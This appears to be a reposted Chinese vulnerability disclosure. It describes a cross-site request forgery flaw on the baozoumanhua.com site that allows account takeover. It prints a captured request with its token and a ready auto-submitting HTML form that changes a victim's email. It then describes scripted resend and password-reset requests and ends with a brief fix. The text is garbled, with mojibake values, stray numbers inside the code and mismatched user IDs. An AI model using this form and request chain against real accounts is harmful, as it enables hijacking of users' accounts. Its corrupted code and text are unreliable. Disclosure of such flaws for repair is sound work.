把token带到 http头部 或者验证一下referer

提交地址:http://baozoumanhua.com/users/8311358 提交数据: -----------------------------195704664324 Content-Disposition: form-data; name="utf8" a?? -----------------------------195704664324 Content-Disposition: form-data; name="_method" put -----------------------------195704664324 Content-Disposition: form-data; name="authenticity_token" FI+dAl32T5Oh1W5G0LQ4ArOK1t9JQRqoNOLWHaTHEgk= -----------------------------195704664324 Content-Disposition: form-data; name="user[email]" aaaxasa1@qq.com -----------------------------195704664324 Content-Disposition: form-data; name="commit" ?????1é????± 这是有token的 接着我写一个表单 <form id="csrf" action="http://baozoumanhua.com/users/用户id" method="post"> <input type=hidden name="utf8" value="a??"> <input type=hidden name="_method" value="put"> <input type=hidden name="authenticity_token" value="FI+dAl32T5Oh1W5G0LQ4ArOK1t9JQRqoNOLWHaTHEgk="> <input type=hidden name="user[email]" value="你的邮箱"> <input type=hidden name="commit" value="?????1é????±"> <script> document.getElementById('csrf').submit(2881064151); </script> </form> 再点击发送激活邮件 抓包 GET:http://baozoumanhua.com/my/resend/用户ID 此时我将表单的 email 换成个人有效邮箱 接着打开而且抓包 直接提示修改为功 无视token 能够看到 先get访问了 a.htm 而后再post提交到 暴走漫画 如今邮箱改掉了 只须要 访问http://baozoumanhua.com/my/resend/8311358 就行 至于这个 作个弹窗到新窗口 弹到b.htm b.htm 用js写个每一秒GET访问一次 http://baozoumanhua.com/my/resend/2881064151 这时我被弹到了b.htm, 被弹到b.htm后会不少次get访问http://baozoumanhua.com/my/resend/8311358 接着我就收到了激活邮件 如今被激活了 就能够去http://baozoumanhua.com/fetchpass 发送一个重置密码邮件。 =。= 接着就能够改他的密码了 修复方案: 能够像上次那个漏洞同样 WooYun: 暴走漫画越权发暴漫做品(拿王尼玛账号测试)利用打赏功能发财致富走上人生巅峰 把token带到 http头部 或者验证一下referer。
相关文章
相关标签/搜索